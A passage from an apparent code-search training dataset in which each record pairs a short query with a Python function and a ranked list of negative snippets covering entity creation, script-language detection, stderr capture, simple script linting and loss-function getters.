threading.Thread(target=myuiautomator.do_popup_windows, args=(5, find_text, dname))\n threads.append(proc_process)\n threads.append(install_app)\n for t in threads:\n t.setDaemon(True)\n t.start()\n sleep(2)\n t.join()\n except Exception, ex:\n print ex\n sleep(5)\n if number == 0:\n if theme_type.upper() == 'VLIFE':\n vlife_theme_path = theme_config.getValue(dname, 'vlife_theme_path').split('|')\n elif theme_type.upper() == 'SYSTEM':\n vlife_theme_path = theme_config.getValue(dname, 'system_theme_path').split('|')\n else:\n vlife_theme_path = theme_config.getValue(dname, 'third_party_theme_path').split('|')\n else:\n tag = 'vlife_theme_path_' + str(number)\n vlife_theme_path = theme_config.getValue(dname, tag).split('|')\n\n width, height = DEVICE.get_screen_normal_size()\n\n try:\n\n for text in vlife_theme_path:\n # try to swipe screen multiple times\n if text.startswith('NAME'):\n search_text = text.split('_')[1]\n for i in range(5):\n result = click_text(dname, search_text)\n if result:\n break\n else:\n # swipe screen\n cmd = 'input swipe {0} {1} {2} {3} 200'.format(int(width)/2, int(height)/2, int(width)/2, int(height)/2-300)\n DEVICE.shell(cmd)\n sleep(1)\n else:\n click_text(dname,text)\n\n # for i in range(3):\n # x = 0\n # y = 0\n # element = myuiautomator.Element(dname)\n # event = myuiautomator.Event(dname)\n # if text.find(':') == -1:\n # value = unicode(text)\n # # because there is not 'click' action on text, so have to click next to element\n # else:\n # value = unicode(text.split(':')[0])\n # x = text.split(':')[1]\n # y = text.split(':')[2]\n # ele = element.findElementByName(value)\n # if ele is not None:\n # event.touch(ele[0]-int(x), ele[1]-int(y))\n # sleep(2)\n # break\n # else:\n # # swipe screen\n # cmd = 'input swipe {0} {1} {2} {3} 200'.format(int(width)/2, int(height)/2, int(width)/2, int(height)/2-300)\n # DEVICE.shell(cmd)\n # sleep(1)\n\n except Exception,ex:\n print ex\n # return to HOME\n for i in range(3):\n DEVICE.send_keyevent(4)", "def set_light_on(self):\r\n self._light = \"ON\"", "def main():\r\n root = tk.Tk()\r\n app = Home(root)\r\n root.geometry(app.resize())\r\n root.configure(background = jt.color_background)\r\n root.mainloop()" ]
[ "0.73362345", "0.7268235", "0.6951579", "0.6824019", "0.67134887", "0.61943114", "0.61578697", "0.61033326", "0.6091632", "0.6071398", "0.60527337", "0.5875625", "0.5875625", "0.58475655", "0.57241774", "0.57137465", "0.5653085", "0.5578202", "0.54841846", "0.54613185", "0.5428388", "0.54159576", "0.5393109", "0.5342636", "0.5280186", "0.5220907", "0.52142525", "0.51548755", "0.51536065", "0.51469064" ]
0.743344
0
Create new entity returning uuid of created record
def create_entity(data: dict) -> str: new_uuid = str(uuid4()) Entity.create(uuid=new_uuid, data=data["data"]) return new_uuid
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _create_instance(**kwargs):\n ctxt = context.get_admin_context()\n return db.instance_create(ctxt, _create_instance_dict(**kwargs))['id']", "def new(self):\n uuid = uuid4().hex\n cur = self.conn.cursor()\n cur.execute(\n \"\"\"\n INSERT INTO experiments (uuid)\n VALUES(?)\n \"\"\", [uuid])\n cur.close()\n self.conn.commit()\n return uuid", "def _create_entity(self, model_name, entity):\n model_pool = self.pool.get(model_name)\n prepared_entity = self._prepare_entity(model_name, entity)\n if not prepared_entity:\n logger.debug(\"Prepared entity is empty : %s model %s\" % (prepared_entity, model_name))\n return False\n\n logger.debug(\"Creating entity %s\\n%s\" % (model_name, prepared_entity))\n new_id = model_pool.create(self.cr, self.uid, prepared_entity)\n\n logger.debug(\"Created %s, id %s\" % (model_name, new_id))\n return new_id", "def create(cls, **kwargs):\n instance = cls(**kwargs)\n return instance.save().serialize()", "async def create(self, payload):\n\n async with self.db.manager.database.transaction():\n obj = await self._expand(await self.db.create(**payload))\n self.log.info(f\"New {self.db_model_name}: {obj}\")\n return obj", "def create(cls, dump, model, pid_provider, legacy_id_key=\"legacy_recid\"):\n record = cls.create_record(\n dump, model, pid_provider, legacy_id_key=legacy_id_key\n )\n return record", "def create():", "def create():", "def _create(cls, model_class, *args, **kwargs):\n for k in kwargs.keys():\n if k in model_class.relationships():\n rel_key = '{}_id'.format(k)\n kwargs[rel_key] = str(kwargs[k].id)\n obj = super(BaseFactory, cls)._create(model_class, *args, **kwargs)\n obj.save(obj)\n return obj", "def test_uuid_created():\n assert type(sc.current.id) == str", "def create(self):\n ...", "def create_tag_id():\n return uuid.uuid1().int", "def create():\n pass", "def create(self):", "def test_create(self):\n\n res = self.metadata.create_or_update(data=self.create)\n\n self.assertEqual(res.name, self.entity.name)\n self.assertEqual(res.service.id, self.entity.service.id)\n self.assertEqual(res.owner, None)", "def _create(self, **attributes: Dict[str, object]) -> str:\n pass", "def insert(self):\n item = self.create()\n return item.id", "def test_create_record(self):\n pass", "def create_person(self):", "def create(cls, **kwargs):\n instance = cls(**kwargs)\n return instance.save()", "def create(cls, **kwargs):\n instance = cls(**kwargs)\n return instance.save()", "def create(cls, **kwargs):\n instance = cls(**kwargs)\n return instance.save()", "def _generate_uuid(self):\n\n return uuid.uuid4()", "def create_id():\n unique_id = UniqueId()\n unique_id.put()\n return unique_id.key().id()", "def create_id():\n unique_id = UniqueId()\n unique_id.put()\n return unique_id.key().id()", "def create(self):\n\n pass", "def createRecord(self):\n self.dto.getRecord().append(self.controller.createNewObj())\n print(\"Record added.\")", "def get_or_create_unique_id(self):\n if not self.unique_id:\n self.unique_id = uuid.uuid4().hex\n return self.unique_id", "def test_create_identity(self):\n pass", "async def create(self, payload):\n\n return await self.creator.write(payload)" ]
[ "0.6654303", "0.6614401", "0.6504342", "0.64369875", "0.6267132", "0.6234407", "0.62021786", "0.62021786", "0.61904436", "0.6179102", "0.613219", "0.61154836", "0.60848325", "0.6072805", "0.60569495", "0.6037746", "0.6018132", "0.6005871", "0.6001378", "0.59915316", "0.59915316", "0.59915316", "0.5991292", "0.59725755", "0.59725755", "0.5938451", "0.59308", "0.59297955", "0.5913915", "0.5903627" ]
0.7855162
0
determine langage used base on the extension
def identifyLangage(script): langage = "undefined" scriptNameInArray = script.split(".") extension = scriptNameInArray[-1] if(extension == "pl"): langage = "perl" elif(extension == "py"): langage = "python" elif(extension == "sh"): langage = "bash" else: langage == "not recognised" return langage
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_lang(self):\n return self.langs.lang", "def get_language(self, article):\r\n # we don't want to force the target laguage\r\n # so we use the article.meta_lang\r\n if self.config.use_meta_language == True:\r\n if article.meta_lang:\r\n return article.meta_lang[:2]\r\n return self.config.target_language", "def get_language(self):\n return self.lang", "def srclang(self):\n return self.__srclang", "def init_language(self):\n\n if 'HTTP_COOKIE' in os.environ:\n cookies = os.environ['HTTP_COOKIE'].split(';')\n for cookie in cookies:\n (key, value) = cookie.split('=')\n if key == Intuition.COOKIE_USERLANG:\n return value\n \n return self.default_language", "def lang(self):\n return self._lang", "def get_lang(self):\n\n path = self.get_lang_path()\n for language in self.languages:\n if language in path:\n return language", "def get_language(fn):\n # FIXME - this expects the fn to be '.../XX/LC_MESSAGES/messages.po'\n return fn.split(os.sep)[-3]", "def get_locale():\n return \"he\"", "def get_meta_lang(self):\n # we have a lang attribute in html\n attr = self.parser.getAttribute(self.article.doc, attr='lang')\n if attr is None:\n # look up for a Content-Language in meta\n items = [\n {'tag': 'meta', 'attr': 'http-equiv', 'value': 'content-language'},\n {'tag': 'meta', 'attr': 'name', 'value': 'lang'}\n ]\n for item in items:\n meta = self.parser.getElementsByTag(self.article.doc, **item)\n if meta:\n attr = self.parser.getAttribute(meta[0], attr='content')\n break\n\n if attr:\n value = attr[:2]\n if re.search(RE_LANG, value):\n return value.lower()\n\n return None", "def get_language(self):\r\n return self.language", "def get_lang(self):\n props = getToolByName(self.context,\n 'portal_properties')\n return props.site_properties.getProperty('default_language') or 'en'", "def language(self):\n lang = None\n if self.__dict__['TAG:language']:\n lang = self.__dict__['TAG:language']\n return lang", "def get_lang(ix):\n\tlang = None\n\tif ix == 0:\n\t\tlang = setting.TLA_ENG\n\telif ix == 1:\n\t\tlang = setting.TLA_JP\n\telse:\n\t\tlang = setting.TLA_VN\n\n\tf = open (f\"lang\\\\{lang}.json\", encoding=setting.TLA_UTF8)\n\tglobal data_json\n\tdata_json = json.load(f)\n\n\treturn lang", "def get_language(self, text):\n try:\n post_lang = detect(text)\n except:\n post_lang = 'N/A'\n return post_lang", "def get_language(self) -> str:\n return self.language", "def language(self, target):\n self._check_target(target)\n return target.language or self._default_language", "def language(self):\n if \"language\" in self._prop_dict:\n return self._prop_dict[\"language\"]\n else:\n return None", "def getMetaLang(self, article):\n # we have a lang attribute in html\n attr = Parser.getAttribute(article.doc, attr='lang')\n if attr is None:\n # look up for a Content-Language in meta\n kwargs = {'tag':'meta',\n 'attr':' http-equiv',\n 'value':'content-language'}\n meta = Parser.getElementsByTag(article.doc, **kwargs)\n if meta:\n attr = Parser.getAttribute(meta[0], attr='content')\n \n if attr:\n value = attr[:2]\n if re.search(RE_LANG, value):\n return value.lower()\n \n return None", "def get_language(self, article):\r\n # we don't want to force the target laguage\r\n # so we use the article.meta_lang\r\n if self.config.use_meta_language == True:\r\n if article.meta_lang:\r\n self.language = article.meta_lang[:2]\r\n self.language = self.config.target_language", "def use_en(self):\n pass", "def get_project_lang(self):\n return self.project_name_lang.currentText() # .replace(\"é\",\"e\").lower()", "def language(self):\r\n return self._get('language', {})", "def lang_genoeg(lengte):\n return", "def get_meta_lang(self, article):\r\n # we have a lang attribute in html\r\n attr = self.parser.getAttribute(article.doc, attr='lang')\r\n if attr is None:\r\n # look up for a Content-Language in meta\r\n items = [\r\n {'tag': 'meta', 'attr': 'http-equiv', 'value': 'content-language'},\r\n {'tag': 'meta', 'attr': 'name', 'value': 'lang'}\r\n ]\r\n for item in items:\r\n meta = self.parser.getElementsByTag(article.doc, **item)\r\n if meta:\r\n attr = self.parser.getAttribute(meta[0], attr='content')\r\n break\r\n\r\n if attr:\r\n value = attr[:2]\r\n if re.search(RE_LANG, value):\r\n return value.lower()\r\n\r\n return None", "def get_language():\n try:\n from leaves.middleware import request_context\n return request_context.language\n except:\n return get_site().preferences.default_language", "def _getLang(self, language):\n if language == None:\n language = self.getDefaultLanguage()\n\n return language", "def _get_lang(self, *args, **kwargs):\n if \"lang\" in kwargs:\n if kwargs[\"lang\"] in self._available_languages:\n self.lang = kwargs[\"lang\"]", "def get_language(self, word, lang=None):\n lang = lang or self.cfg.get('lang', 'en')\n # let's retrieve the word from configuration dict.\n try:\n return self.cfg['words_' + lang][word]\n except StandardError:\n return 'Do not know how to \"{}\" in \"{}\"'.format(word, lang)", "def get_language(self) -> str:\n return settings.LANGUAGE_CODE" ]
[ "0.717291", "0.71475804", "0.70080835", "0.70027035", "0.69902664", "0.698173", "0.6898868", "0.6871327", "0.6855876", "0.68457574", "0.6826537", "0.6808138", "0.6802423", "0.6731631", "0.6702847", "0.668899", "0.664422", "0.6610783", "0.6597736", "0.6578168", "0.65664876", "0.6543513", "0.65301687", "0.6521221", "0.64974016", "0.6491613", "0.64822537", "0.6477741", "0.64712894", "0.64520067" ]
0.75546545
0
Get the stderr of script
def getErrors(script): p = subprocess.Popen(['./'+script], stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = p.communicate() return err
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_stderr(self):\n return self._get_log('stderr')", "def stderr(self) -> str:\n _args: list[Arg] = []\n _ctx = self._select(\"stderr\", _args)\n return _ctx.execute_sync(str)", "def result_stderr(result):\n return result[1][1]", "def stderr(self):\n return self.__stderr", "def get_stderr(self):\n stderr = [val.get_stderr() for val in self._args_list]\n return '\\n'.join(stderr)", "def get_stderr(self) :\n\t\tif self.__stderr is not None :\n\t\t\tself.__stderr.flush()\n\t\t\treturn self.__stderr.getvalue()", "def stderr(self):\n if self._stderr is None:\n stderr = [p.stderr.read() for p in self.processes if p.stderr]\n output = b'\\n'.join(stderr).strip()\n if not isinstance(output, str):\n output = output.decode(self.encoding, 'ignore')\n self._stderr = output\n return self._stderr", "def get_stderr(self):\n _ = self.get() # force finished wait\n if self._stderr is not None:\n if wait_until_exists(self._stderr):\n with open(self._stderr) as f:\n self._err = f.read()\n return self._err", "def stderr(self: \"ShellOutput\") -> Artefact[bytes]:\n self.__check_len()\n return self.stderrs[0]", "def stderr(self):\n if self._uuid is None:\n return \"\"\n resp = self._connection._get(\n get_url('task stderr', uuid=self._uuid))\n\n if resp.status_code == 404:\n raise MissingTaskException(resp.json()['message'])\n\n raise_on_error(resp)\n return resp.text", "def stderr(self, stderr: str) -> Tuple[List[Message], List[AnnotateCode], str]:\n return [], [], stderr", "def fresh_stderr(self):\n if self._uuid is None:\n return \"\"\n resp = self._connection._post(\n get_url('task stderr', uuid=self._uuid))\n\n if resp.status_code == 404:\n raise MissingTaskException(resp.json()['message'])\n\n raise_on_error(resp)\n return resp.text", "def stderr_path(self):\n return self.log_path\n # return self.path / 'stderr.txt'", "def __readStderr(self):\n if self.process is not None:\n self.errorGroup.show()\n s = str(self.process.readAllStandardError(),\n Preferences.getSystem(\"IOEncoding\"),\n 'replace')\n self.errors.insertPlainText(s)\n self.errors.ensureCursorVisible()", "def err(self):\n return self._err.getvalue()", "def std_err(self):\n return self._std_err", "def stderr(username, root_wf_id, wf_id, job_id, job_instance_id):\n dashboard = Dashboard(g.master_db_url, root_wf_id, wf_id)\n text = dashboard.get_stderr(wf_id, job_id, job_instance_id)\n\n if text.stderr_text == None:\n return 'No Standard error for workflow ' + wf_id + ' job-id ' + job_id\n else:\n return '<pre>%s</pre>' % utils.unquote(text.stderr_text)", "def geterr():\n return __errprof.state.copy()", "def get_output_error(cmd, **kwargs):\n if not isinstance(cmd, list):\n cmd = [cmd]\n logging.debug(\"Running: %s\", ' '.join(map(quote, cmd)))\n try:\n result = Popen(cmd, stdout=PIPE, stderr=PIPE, **kwargs)\n except OSError as e:\n return -1, '', f'Failed to run {cmd!r}: {e!r}'\n so, se = result.communicate()\n # unicode:\n so = so.decode('utf8', 'replace')\n se = se.decode('utf8', 'replace')\n\n return result.returncode, so, se", "def stderr_output(cmd):\n\n handle, gpg_stderr = stderr_handle()\n try:\n output = subprocess.check_output(cmd, stderr=gpg_stderr) # nosec\n if handle:\n handle.close()\n\n return str(polite_string(output))\n except subprocess.CalledProcessError as exception:\n LOGGER.debug(\"GPG Command %s\", ' '.join(exception.cmd))\n LOGGER.debug(\"GPG Output %s\", exception.output)\n raise CryptoritoError('GPG Execution')", "def err(string, exitval):\n\tprint >> sys.stderr, string.rstrip()\n\tsys.exit(exitval)", "def geterror(self):\n c = [self.nsdchat, '-s', self.connection_string, '-c', 'geterror']\n process = subprocess.Popen(\n c, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n try:\n out, err = process.communicate()\n except subprocess.TimeoutExpired:\n process.kill()\n raise\n if (process.returncode != 0):\n Connection.logger.error(\"nsdchat exited with errorcode \"\n \"{rc}.\".format(rc=process.returncode))\n else:\n return out.decode('utf-8')", "def errors(self):\n return self.args[1]", "def readProcessStderrLog(self, name, offset, length):\r\n self._update('readProcessStderrLog')\r\n return self._readProcessLog(name, offset, length, 'stderr')", "def get_exitcode_stdout_stderr(cmd):\n args = shlex.split(cmd)\n\n proc = Popen(args, stdout=PIPE, stderr=PIPE)\n out, err = proc.communicate()\n exitcode = proc.returncode\n #\n # return exitcode, out.decode(\"utf-8\"), err\n return out.decode(\"utf-8\")", "def error(self) -> list:\n return self.__err", "def get_stderr(self, save=True, delete_file=None, update=True):\n _logme.log(('Getting stderr, save={}, auto_delete={}, '\n 'delete_file={}').format(\n save, self.auto_delete, delete_file\n ), 'debug')\n if delete_file is None:\n delete_file = self.clean_outputs\n if self.done and self._got_stderr:\n _logme.log('Getting stderr from _stderr', 'debug')\n return self._stderr\n if update and not self._updating and not self.done:\n self.update()\n if not self.done:\n _logme.log('Job not done, attempting to get current STDERR ' +\n 'anyway', 'info')\n _logme.log('Getting stderr from {}'.format(self.kwargs['errfile']),\n 'debug')\n if _os.path.isfile(self.kwargs['errfile']):\n stderr = open(self.kwargs['errfile']).read()\n if delete_file is True or self.auto_delete is True:\n _logme.log('Deleting {}'.format(self.kwargs['errfile']),\n 'debug')\n _os.remove(self.kwargs['errfile'])\n if save:\n self._stderr = stderr\n if self.done:\n self._got_stderr = True\n return stderr\n else:\n _logme.log('No file at {}, cannot get stderr'\n .format(self.kwargs['errfile']), 'warn')\n return None", "def get_error_log(self) -> Any:\n return self.err", "def errorCheck(sh, returncode, stderr):\n\tif returncode!=0 or stderr!='':\n\t\tif config.DEBUG:\n\t\t\tmsg = \"sh code execution [%s] returned non-zero exit status [%s] and/or non-empty stdterr [%s]\" % (repr(sh), returncode, repr(stderr.strip()))\n\t\telse:\n\t\t\tmsg = \"sh code execution returned non-zero exit status and/or non-empty stdterr\"\n\t\traise Exception(msg)", "def do_get_error(self):\n if self._last_exception is None:\n print('no errors')\n else:\n traceback.print_exception(*self._last_exception)" ]
[ "0.80331707", "0.77476525", "0.77177006", "0.7631188", "0.73205614", "0.72101223", "0.7183124", "0.7134146", "0.7087779", "0.70248073", "0.6913695", "0.6896512", "0.6791896", "0.66601497", "0.66361713", "0.65947324", "0.64891607", "0.64813185", "0.63999623", "0.6331216", "0.6231364", "0.62112457", "0.61965394", "0.61763775", "0.6168094", "0.61588836", "0.6155056", "0.615473", "0.61277765", "0.6126049" ]
0.79301566
1
scan script for simple errors
def scanForSimpleError(script): langage = identifyLangage(script) line_number = 0 logFile_name = "scan.log" # Scanning File logFile = open(logFile_name, 'w') scriptFile = open(script, 'r') for line in scriptFile: line_number +=1 lineWithoutBackN = line.replace("\n", "") lineInArray = lineWithoutBackN.split(" ") lastWord = lineInArray[-1] lastWordInArray = list(lastWord) lineInCharacterArray = list(lineWithoutBackN) ######################### # looking for a shebang # # => for perl # # => for bash # ######################### if(langage == "perl" and line_number == 1 and lineInArray[0] != "#!/usr/bin/perl"): logFile.write("[WARNING]: SET line "+str(line_number)+" TO #!/usr/bin/perl\n") if(langage == "bash" and line_number == 1 and line != "#!/bin/bash"): logFile.write("[WARNING]: SET line "+str(line_number)+" TO #!/bin/bash\n") ######################### # Check for semi-column # # => for perl # ######################### if(len(lastWordInArray) > 0): if(langage == "perl" and line_number != 1 and lastWordInArray[-1] != ";"): if(lastWordInArray != "}"): firstNonEmptyCharacter = getFirstNonEmptyCharInArray(lineInCharacterArray) if(firstNonEmptyCharacter != "#"): logFile.write("[ERROR]: ADD \";\" to line "+str(line_number)+"\n") ################################# # Check variable declaration # # => for perl # ################################# if(getFirstNonEmptyCharInArray(lineInCharacterArray) != "#" ): word_number = 0 for word in lineInArray: if(word == "my"): variable = lineInArray[word_number+1] variableInArray = list(variable) if(variableInArray[0] != "$" and variableInArray[0] != "@"): if "list" in variable: logFile.write("[ERROR]: ADD \"@\" to "+variable+", line "+str(line_number)+"\n") else: logFile.write("[ERROR]: ADD \"$\" to "+variable+", line "+str(line_number)+"\n") scriptFile.close() logFile.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def scan_error(self, line: int, message: str):\n self.report(line, \"\", message)", "def error_check(command):\r\n\r\n # TODO\r", "def check_errors(self) -> None:", "def check_errors():\n\n for error in errors:\n ERROR('%s' % str(error))\n\n if len(errors) != 0:\n sys.exit(1)", "def parse_lspci_vv_chk_error(output,raiseOnErrors = \"1\"):\n \n found_devSta = 0\n \n #sys.exit(1)\n if re.search(\"DevSta\",output):\n found_devSta = 1\n \n # remove DevStat after splitting it\n l_a = output.split(\":\")\n l_a1 = l_a[1].split()\n for m in l_a1:\n \n # if ends with +, \n if re.search(\"Err\",m):\n if re.search(\".*\\+$\",m):\n \n print \"-\" * 8\n \n errorStr = \"Found + in lspci output for '%s' , line details '%s'\"%(m,output)\n trace_error(errorStr)\n if raiseOnErrors == \"1\":\n raise ViriError(errorStr)\n\n return 2\n \n if found_devSta == 0:\n raise ViriError(\"Did not find 'devSta' in the output %s\"%output)\n\n trace_info(\"No lspci correctable or uncorrectable issues seem to be present , output '%s'\"%output)\n return 1", "def check_for_errors(self):\n\n with open(\"output.dat\", \"r\") as log:\n for line in log:\n if \"*** Psi4 exiting successfully.\" in line:\n return {\"success\": True}\n\n elif \"*** Psi4 encountered an error.\" in line:\n return {\"success\": False, \"error\": \"Not known\"}\n\n return {\"success\": False, \"error\": \"Segfault\"}", "def check_errors(self):\n\n errors = []\n while True:\n err = self.values(\"SYST:ERR?\")\n if int(err[0]) != 0:\n errmsg = \"Agilent 5313xA: {0}: {1}\".format(err[0], err[1])\n log.error(errmsg + '\\n')\n errors.append(errmsg)\n else:\n break\n\n return errors", "def cmd_error_check(self, cmd_out):\n for err in self.err_strings:\n if re.search('\\\\b%s\\\\b' % (err), cmd_out, re.I):\n _log.info(cmd_out)\n _log.info(\n \"Cmd execution failed! with this Return Error: \\n%s\" % (\n cmd_out))\n return 0", "def call_error():\r\n print(\"Error in input format.\")\r\n sys.exit()", "def check_errors(stderr):\n for ee in err_regex:\n if ee['re'].search(stderr) is not None:\n raise RuntimeError(ee['message'])", "def get_errors(cursor):\n while True:\n message = cursor.lpop(\"errors\")\n if message is None:\n print(\"There are no errors more\")\n return None\n print(message)", "def errors(conf, daemon):\n # persisted dict interface for long term memory\n errors = Shove('file://{0}'.format(conf.app.errors), protocol=2, flag='r')\n if any(errors):\n print(\"errors found\")\n for path, error in six.iteritems(errors):\n pp(error)\n errors.close()\n exit(1)\n # ⏏ exit the program with an error\n else:\n print(\"no errors found - OK\")\n print()\n errors.close()", "def ERR(self):", "def test_bad_input():\n\n for arg in ['5', 'ch']:\n rv, out = getstatusoutput('{} {}'.format(prg, arg))\n assert rv == 0\n expected = 'I do not know \"{}\".'.format(arg)\n assert out.strip() == expected", "def main():\n\ttest() #test ParseError", "def parser_error(msg):\n global MESSAGES\n if CURRENT_ROW != None:\n msg = \"row \"+str(CURRENT_ROW)+\": \"+msg\n msg += \"<br/>\\n&nbsp;&nbsp;&nbsp;starting with: \"\n for col in range(5):\n val = cellval(CURRENT_ROW, col)\n if val == None:\n val = \"\"\n msg += val+\" | \"\n MESSAGES.append(\"ERROR: \"+msg)", "def run_check_errors(cmd):\n if type(cmd) == str:\n cmd = cmd.split()\n output = subprocess.run(cmd, capture_output=True, text=True)\n if output.stderr != \"\":\n print_cmd = \" \".join(map(str, cmd))\n sys.exit(\n f\"The error {output.stderr} was generated when running {print_cmd}. Exiting.\"\n )\n return", "def file_name_check(file_name):\n # Please print out which line of the above program contains an error. E.g. if the bug is on line 4 then print 4\n # END OF CONTEXT\n print(\"9\")\n # END OF SOLUTION", "def test_scan_file(self):\n self.run_scan(self.filename, 1)", "def IdentifySimpleError(langage, errorLog):\n\t\n\tif(langage == \"perl\"):\n\t\terrorLogInArray = errorLog.split(\" \")\n\t\tif(errorLogInArray[0] == \"syntax\" and errorLogInArray[1] == \"error\"):\n\t\t\tif (errorLogInArray[4] == \"line\"):\n\t\t\t\terrorLineInArray = errorLogInArray[5].split(\",\")\n\t\t\t\terrorLine = int(errorLineInArray[0])-1\n\t\t\t\tprint \"ADD \\\";\\\" at the end of line \"+str(errorLine)+\" IF \\\";\\\" is missing\\n\"", "def valid_syntax(command):\n\n for ev, value in bash_iter(command, syntax_check=True):\n if ev == \"err\":\n if value.endswith(\"syntax error: unexpected end of file\"):\n return False\n if \"unexpected EOF while looking for matching\" in value:\n return False\n if \"here-document at line\" in value:\n return False\n return value == 0", "def test_bad_file():\n\n bad = ''.join(random.choices(string.ascii_uppercase + string.digits, k=5))\n rv, out = getstatusoutput(f'{prg} -f {bad}')\n assert rv != 0\n assert re.match('usage:', out, re.I)\n assert re.search(f\"No such file or directory: '{bad}'\", out)", "def checkScriptParses(scriptVersion, script):\n tokenizer = ScriptTokenizer(scriptVersion, script)\n while tokenizer.next():\n pass\n return tokenizer.err", "def parse_syntax_result(result):\n match_result = re.compile(\"(?P<error>\\w+\\s\\w+) at or near\"\n \" '(?P<near>\\S+)', line (?P<line>\\d+), in (?P<module>\\S+)\")\n used_mod_re = re.compile(\"Module:\\s(\\S+)\\s\\s+Errors:\")\n # noinspection SpellCheckingInspection\n error_re = re.compile(\"Errors:\\s+(.*)\\sat\\sor\\snear \")\n\n if \"No issues found!\" in result:\n sys.stdout.write(\"No issues found!\")\n\n if \"Errors\" in result:\n parsed_output = match_result.findall(result)\n used_mod = used_mod_re.findall(result)\n errors = error_re.findall(result)\n\n if parsed_output and used_mod:\n\n for item in parsed_output:\n\n error = (\"Found errors \\'\" + str(errors[0]) + \"\\' in: \" + str(used_mod[0]) +\n \"\\nModule: \" + str(used_mod[0]) + \", Error: \" + str(item[0]) +\n \", Near: \" + str(item[1]) + \", Line: \" + str(item[2] + \"\\n\"))\n\n sys.stderr.write(error)", "def test_err(self, start: Result[int, str], exp: Option[str]) -> None:\n assert start.err() == exp", "def error_analyze(\n self,\n data_dir: Path,\n processed_data_dir: Path,\n result_dir: Path,\n output_report_dir: Path,\n ) -> NoReturn:\n pass", "def error_check(self, message):\n matches = ERROR_SYNTAX.match(message)\n if matches:\n error_code = int(matches.group(1))\n error_message = matches.group(2)\n return error_code, error_message\n return None", "def die_screaming(instr):\n LOG.error(instr)\n sys.exit(1)", "def die_screaming(instr):\n LOG.error(instr)\n sys.exit(1)", "def handle_errors(self, err_list):\n for (etype, err_cde, err_str, err_value, src_line) in err_list:\n if etype == 'isa':\n self.isa_error(err_cde, err_str)\n elif etype == 'gs':\n self.gs_error(err_cde, err_str)\n elif etype == 'st':\n self.st_error(err_cde, err_str)\n elif etype == 'seg':\n self.seg_error(err_cde, err_str, err_value, src_line)" ]
[ "0.6841208", "0.68405724", "0.66131353", "0.6445967", "0.6399118", "0.6177685", "0.61256075", "0.6095763", "0.6076316", "0.6045332", "0.60325944", "0.5948576", "0.5919206", "0.5869653", "0.58674383", "0.58112127", "0.5804113", "0.5793846", "0.57393223", "0.57348496", "0.5731093", "0.57179433", "0.571668", "0.5689055", "0.5682707", "0.56733185", "0.5668128", "0.5656445", "0.5656445", "0.5655577" ]
0.754085
0
Returns the loss function that will be used to train the encoder.
def get_loss_fn(self): raise NotImplementedError()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_loss_fn():\n return reconstruction", "def get_loss(self):\n raise NotImplementedError", "def loss(self):\n return 'mse'", "def loss_op(self):\n return self.loss", "def get_loss_function(loss):\n try:\n\n loss_func_map = {\"sparse_softmax_cross_entropy\": tf.losses.sparse_softmax_cross_entropy,\n \"sigmoid_cross_entropy\": tf.losses.sigmoid_cross_entropy,\n \"softmax_cross_entropy\": tf.losses.softmax_cross_entropy}\n\n except Exception as error:\n raise EnvironmentError(\"get_loss_function: Exception getting loss function: {0}\".format(error))\n\n return loss_func_map[loss]", "def _get_loss(self):\n raise NotImplementedError", "def get_loss_fn(params):\r\n i = importlib.import_module(\"dlex.utils.losses\")\r\n return getattr(i, params.loss)", "def loss(self):\n return self._get(\"loss\")", "def loss(self):\n return self._loss", "def calc_loss(self, codes, encodings):\n return tf.reduce_mean((encodings - tf.stop_gradient(codes)) ** 2)", "def calc_loss(self, codes, encodings):\n return tf.reduce_mean((tf.stop_gradient(encodings) - codes) ** 2)", "def get_loss(self):\r\n\r\n if F.loss_type==\"cosine\":\r\n self.losscos = r2d*tf.acos(1-tf.losses.cosine_distance(tf.nn.l2_normalize(self.labels,1), tf.nn.l2_normalize(self.out, 1), dim=1))\r\n self.loss = tf.losses.cosine_distance(tf.nn.l2_normalize(self.labels,1), tf.nn.l2_normalize(self.out, 1), dim=1)\r\n elif F.loss_type==\"mse2d\":\r\n xl, yl, zl = tf.split(self.labels, 3, axis=1)\r\n xo, yo, zo = tf.split(self.out, 3, axis=1)\r\n thetal, thetao = tf.asin(-yl), tf.asin(-yo)\r\n phil, phio = tf.atan2(-zl, -xl), tf.atan2(-zo, -xo)\r\n self.lb = tf.concat([thetal, phil], axis=1)\r\n self.ob = tf.concat([thetao, phio], axis=1)\r\n self.loss = tf.scalar_mul(tf.constant(r2d), tf.losses.mean_squared_error(self.lb, self.ob, 2))\r\n elif F.loss_type==\"mse3d\":\r\n self.loss = tf.losses.mean_squared_error(tf.nn.l2_normalize(self.labels, 0), tf.nn.l2_normalize(self.out, 0))", "def get_loss(self):\n return categorical_cross_entropy.get_loss(loss_key=self.loss_key,\n output_name=self.args.output_name)", "def loss(self) -> KernelLoss:\n return self._loss", "def _get_loss_function(project_parameters):\n if 'data_weight' in project_parameters:\n weight = torch.Tensor(list(project_parameters.data_weight.values()))\n else:\n weight = None\n return nn.BCELoss(weight=weight) if project_parameters.loss_function == 'BCELoss' else nn.CrossEntropyLoss(weight=weight)", "def get_loss_func(args: Namespace) -> nn.Module:\n if args.dataset_type == 'classification':\n return nn.BCEWithLogitsLoss(reduction='none')\n\n if args.dataset_type == 'regression':\n return nn.MSELoss(reduction='none')\n\n if args.dataset_type == 'multiclass':\n return nn.CrossEntropyLoss(reduction='none')\n\n raise ValueError(f'Dataset type \"{args.dataset_type}\" not supported.')", "def get_loss_funcs():\n\n def _eucl_loss(x, y):\n return K.sum(K.square(x - y)) / batch_size / 2\n\n losses = {}\n losses[\"weight_stage1_L1\"] = _eucl_loss\n losses[\"weight_stage1_L2\"] = _eucl_loss\n losses[\"weight_stage2_L1\"] = _eucl_loss\n losses[\"weight_stage2_L2\"] = _eucl_loss\n losses[\"weight_stage3_L1\"] = _eucl_loss\n losses[\"weight_stage3_L2\"] = _eucl_loss\n losses[\"weight_stage4_L1\"] = _eucl_loss\n losses[\"weight_stage4_L2\"] = _eucl_loss\n losses[\"weight_stage5_L1\"] 